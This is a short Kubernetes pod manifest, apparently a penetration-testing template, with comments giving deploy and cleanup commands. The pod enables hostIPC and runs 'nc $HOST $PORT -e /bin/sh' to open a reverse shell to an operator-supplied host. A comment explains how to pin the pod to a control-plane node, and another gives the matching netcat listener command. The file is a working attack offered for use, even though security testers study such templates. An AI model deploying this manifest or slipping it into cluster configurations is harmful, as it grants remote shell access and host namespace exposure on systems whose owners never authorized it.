###########################################################
## Set up Listener: nc -nvlp 3116
## Deploy: HOST="10.0.0.1" PORT="3116" envsubst < ./yaml/hostipc/pod-hostipc-revshell.yaml | kubectl apply -f -
## Remove: kubectl -n [namespace] delete pod-hostipc-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-hostipc-revshell
  labels:
    app: pentest
spec:
  hostIPC: true
  containers:
  - image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    name: hostipc--revshell    
  restartPolicy: Always
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name